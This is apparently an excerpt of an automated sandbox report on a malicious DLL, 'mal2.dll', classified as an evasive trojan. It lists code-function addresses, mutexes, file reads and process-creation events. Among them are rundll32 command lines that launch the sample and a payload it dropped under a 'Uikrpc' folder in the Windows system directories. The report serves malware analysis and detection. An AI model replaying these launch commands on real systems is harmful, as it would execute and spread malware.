                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDDD664_2_02FDDD66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD51664_2_02FD5166
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FEF5614_2_02FEF561
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FF25604_2_02FF2560
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD635F4_2_02FD635F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD8D594_2_02FD8D59
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FF2D4F4_2_02FF2D4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FF314A4_2_02FF314A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FEC1454_2_02FEC145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD4F424_2_02FD4F42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE473A4_2_02FE473A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD77394_2_02FD7739
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDE3364_2_02FDE336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE31304_2_02FE3130
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FECF2C4_2_02FECF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FDB12E4_2_02FDB12E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD61254_2_02FD6125
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE85184_2_02FE8518
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD53144_2_02FD5314
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FD81124_2_02FD8112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE670F4_2_02FE670F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE710D4_2_02FE710D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FED10B4_2_02FED10B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE51094_2_02FE5109
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FF33064_2_02FF3306
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02FE99024_2_02FE9902
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332ED956_2_0332ED95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033306EF6_2_033306EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033231306_2_03323130
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331E3366_2_0331E336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332473A6_2_0332473A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033177396_2_03317739
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033161256_2_03316125
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332CF2C6_2_0332CF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331B12E6_2_0331B12E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033181126_2_03318112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033153146_2_03315314
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033285186_2_03328518
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033299026_2_03329902
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033333066_2_03333306
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332D10B6_2_0332D10B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033251096_2_03325109
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332670F6_2_0332670F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332710D6_2_0332710D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332C7726_2_0332C772
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033125756_2_03312575
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033121766_2_03312176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331597D6_2_0331597D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03312B7C6_2_03312B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03325B7C6_2_03325B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332F5616_2_0332F561
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033325606_2_03332560
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033195656_2_03319565
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331DD666_2_0331DD66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033151666_2_03315166
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331196D6_2_0331196D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03318D596_2_03318D59
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331635F6_2_0331635F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03314F426_2_03314F42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332C1456_2_0332C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0333314A6_2_0333314A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03332D4F6_2_03332D4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332BFA16_2_0332BFA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033277A76_2_033277A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033133A96_2_033133A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03313FAF6_2_03313FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03326B916_2_03326B91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033319876_2_03331987
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331F9846_2_0331F984
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03317D876_2_03317D87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331938F6_2_0331938F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03311DF96_2_03311DF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332D5FE6_2_0332D5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03316BFE6_2_03316BFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033335E36_2_033335E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033147E46_2_033147E4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331B7EC6_2_0331B7EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331FBEF6_2_0331FBEF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331A3D46_2_0331A3D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033289DA6_2_033289DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332E7DA6_2_0332E7DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033213DB6_2_033213DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033139C36_2_033139C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03315DC36_2_03315DC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03312DC56_2_03312DC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03320FC56_2_03320FC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03320A376_2_03320A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332CC3F6_2_0332CC3F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033208246_2_03320824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03321C126_2_03321C12
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03332C166_2_03332C16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332BA186_2_0332BA18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331F20D6_2_0331F20D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03331C716_2_03331C71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332E4786_2_0332E478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03330C666_2_03330C66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0332604E6_2_0332604E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331AEB96_2_0331AEB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03323ABE6_2_03323ABE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331F4A56_2_0331F4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033204A46_2_033204A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033256A96_2_033256A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033168AD6_2_033168AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331F6996_2_0331F699
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331D8996_2_0331D899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331C69B6_2_0331C69B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033130856_2_03313085
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331BEF56_2_0331BEF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033320F86_2_033320F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331E6FD6_2_0331E6FD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0331A8E86_2_0331A8E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03330AD36_2_03330AD3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03327EDD6_2_03327EDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_033154C06_2_033154C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C806EF7_2_02C806EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7ED957_2_02C7ED95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C654C07_2_02C654C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C77EDD7_2_02C77EDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C80AD37_2_02C80AD3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6A8E87_2_02C6A8E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C820F87_2_02C820F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6BEF57_2_02C6BEF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6E6FD7_2_02C6E6FD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C630857_2_02C63085
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6C69B7_2_02C6C69B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6F6997_2_02C6F699
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6D8997_2_02C6D899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6F4A57_2_02C6F4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C704A47_2_02C704A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C668AD7_2_02C668AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C756A97_2_02C756A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C73ABE7_2_02C73ABE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6AEB97_2_02C6AEB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7604E7_2_02C7604E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C80C667_2_02C80C66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C81C717_2_02C81C71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7E4787_2_02C7E478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6F20D7_2_02C6F20D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C71C127_2_02C71C12
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C82C167_2_02C82C16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7BA187_2_02C7BA18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C708247_2_02C70824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C70A377_2_02C70A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7CC3F7_2_02C7CC3F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C70FC57_2_02C70FC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C62DC57_2_02C62DC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C639C37_2_02C639C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C65DC37_2_02C65DC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6A3D47_2_02C6A3D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C713DB7_2_02C713DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C789DA7_2_02C789DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7E7DA7_2_02C7E7DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C647E47_2_02C647E4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6FBEF7_2_02C6FBEF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6B7EC7_2_02C6B7EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C835E37_2_02C835E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C66BFE7_2_02C66BFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7D5FE7_2_02C7D5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C61DF97_2_02C61DF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C67D877_2_02C67D87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6F9847_2_02C6F984
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6938F7_2_02C6938F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C819877_2_02C81987
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C76B917_2_02C76B91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C777A77_2_02C777A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7BFA17_2_02C7BFA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C63FAF7_2_02C63FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C633A97_2_02C633A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7C1457_2_02C7C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C8314A7_2_02C8314A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C64F427_2_02C64F42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C82D4F7_2_02C82D4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6635F7_2_02C6635F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C68D597_2_02C68D59
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6DD667_2_02C6DD66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C651667_2_02C65166
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C695657_2_02C69565
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7F5617_2_02C7F561
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C825607_2_02C82560
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6196D7_2_02C6196D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C621767_2_02C62176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C625757_2_02C62575
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7C7727_2_02C7C772
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C62B7C7_2_02C62B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6597D7_2_02C6597D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C75B7C7_2_02C75B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C799027_2_02C79902
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7670F7_2_02C7670F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7710D7_2_02C7710D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7D10B7_2_02C7D10B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C833067_2_02C83306
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C751097_2_02C75109
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C653147_2_02C65314
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C681127_2_02C68112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C785187_2_02C78518
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C661257_2_02C66125
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6B12E7_2_02C6B12E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7CF2C7_2_02C7CF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C6E3367_2_02C6E336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C731307_2_02C73130
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C7473A7_2_02C7473A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02C677397_2_02C67739
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E9D1C10 appears 97 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E9ED350 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E9D1C10 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E9ED350 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                      Source: mal2.dllReversingLabs: Detection: 24%
                      Source: mal2.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\mal2.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mal2.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mal2.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mal2.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mal2.dll,axamexdrqyrgb
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mal2.dll,bhramccfbdd
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mal2.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uikrpc\tumwlrzamddm.oli",YjMy
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mal2.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 7004 -ip 7004
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mal2.dll",Control_RunDLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 308
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 7004 -ip 7004
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 316
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Uikrpc\tumwlrzamddm.oli",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mal2.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mal2.dll,Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mal2.dll,axamexdrqyrgbJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mal2.dll,bhramccfbddJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mal2.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uikrpc\tumwlrzamddm.oli",YjMyJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mal2.dll",Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mal2.dll",Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mal2.dll",Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Uikrpc\tumwlrzamddm.oli",Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 7004 -ip 7004Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 308Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 7004 -ip 7004Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 316Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF332.tmpJump to behavior
                      Source: classification engineClassification label: mal84.troj.evad.winDLL@44/21@0/30
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mal2.dll,Control_RunDLL
                      Source: mal2.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5480:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:4152:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7120:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7004
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
